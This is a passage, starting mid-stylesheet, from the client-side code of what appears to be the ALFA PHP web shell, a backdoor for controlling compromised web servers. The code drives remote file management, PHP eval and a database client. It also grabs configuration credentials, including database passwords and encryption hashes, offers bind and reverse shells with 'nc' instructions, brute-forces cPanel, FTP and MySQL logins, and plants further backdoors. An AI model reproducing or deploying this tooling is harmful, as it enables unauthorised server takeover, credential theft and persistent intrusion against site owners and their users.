4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}'.alfaCssLoadColors().'
</style>';
echo "<script type='text/javascript'>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."';
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";";?>
var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&amp;path="+c_+"&amp;file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"','rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div 